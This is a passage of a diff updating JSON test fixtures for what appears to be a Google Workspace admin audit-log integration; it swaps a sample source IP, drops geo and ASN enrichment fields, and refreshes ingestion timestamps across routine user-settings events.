- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301230700Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TOGGLE_AUTOMATIC_CONTACT_SHARING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.004851Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TOGGLE_AUTOMATIC_CONTACT_SHARING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "TOGGLE_AUTOMATIC_CONTACT_SHARING",
 "id": "1",
@@ -874,7 +694,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -898,35 +718,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301232600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"1\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.004856400Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"1\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
 "provider": "admin",
 "action": "BULK_UPLOAD",
 "id": "1",
@@ -957,7 +759,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -981,35 +783,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301248800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004862100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "BULK_UPLOAD_NOTIFICATION_SENT", "id": "1", @@ -1046,7 +830,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1070,35 +854,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301251700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CANCEL_USER_INVITE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004867700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CANCEL_USER_INVITE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "CANCEL_USER_INVITE", "id": "1", @@ -1135,7 +901,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1159,35 +925,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301253600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_CUSTOM_FIELD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_CUSTOM_FIELD\",\"value\":\"custom\"}]}}", + "ingested": "2021-12-09T13:38:57.004873100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_CUSTOM_FIELD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_CUSTOM_FIELD\",\"value\":\"custom\"}]}}", "provider": "admin", "action": "CHANGE_USER_CUSTOM_FIELD", "id": "1", 
@@ -1224,7 +972,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1248,35 +996,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301255700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_EXTERNAL_ID\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004878500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_EXTERNAL_ID\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_EXTERNAL_ID", "id": "1", 
@@ -1313,7 +1043,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1337,35 +1067,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301257700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_GENDER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004883400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_GENDER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_GENDER", "id": "1", 
@@ -1402,7 +1114,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1426,35 +1138,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301259500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_IM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004886700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_IM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_IM", "id": "1", 
@@ -1491,7 +1185,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1515,35 +1209,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301261200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ENABLE_USER_IP_WHITELIST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004891Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ENABLE_USER_IP_WHITELIST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ENABLE_USER_IP_WHITELIST", "id": "1", 
@@ -1580,7 +1256,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1604,35 +1280,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301263Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_KEYWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004896200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_KEYWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_KEYWORD", "id": "1", 
@@ -1669,7 +1327,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1693,35 +1351,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301264700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LANGUAGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004900900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LANGUAGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_LANGUAGE", "id": "1", 
@@ -1758,7 +1398,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1782,35 +1422,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301266400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LOCATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004904600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LOCATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_LOCATION", "id": "1", 
@@ -1847,7 +1469,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1871,35 +1493,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301268100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ORGANIZATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004909Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ORGANIZATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_ORGANIZATION", "id": "1", 
@@ -1936,7 +1540,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1960,35 +1564,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301269800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_PHONE_NUMBER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004942700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_PHONE_NUMBER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_PHONE_NUMBER", "id": "1", 
